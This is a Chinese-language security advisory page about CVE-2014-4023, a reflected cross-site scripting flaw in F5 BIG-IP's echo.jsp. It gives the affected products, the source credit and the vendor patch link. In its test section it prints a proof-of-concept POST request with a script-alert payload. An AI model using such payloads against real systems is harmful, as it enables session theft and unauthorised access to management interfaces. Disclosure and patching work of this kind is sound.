首页 -> 安全研究

安全研究

安全漏洞
多个F5 BIG-IP产品'echo.jsp'多个跨站脚本漏洞

发布日期:2014-08-28
更新日期:2014-08-29

受影响系统:
F5 BigIP
描述:
BUGTRAQ  ID: 69449
CVE(CAN) ID: CVE-2014-4023

F5 BIG-IP产品可为企业提供集成的应用交付服务,如加速、安全、访问控制与高可用性。

多个F5 BIG-IP产品服务器没有正确编码用户提供的信息,存在反射型跨站脚本漏洞,可使攻击者窃取其他用户会话,未授权访问管理接口。

<*来源:Stefan Viehb&#195;&#182;ck
  
  链接:http://seclists.org/fulldisclosure/2014/Aug/81
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29

<script>alert('xss')</script>

建议:
厂商补丁:

F5
--
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html

浏览次数:2961
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障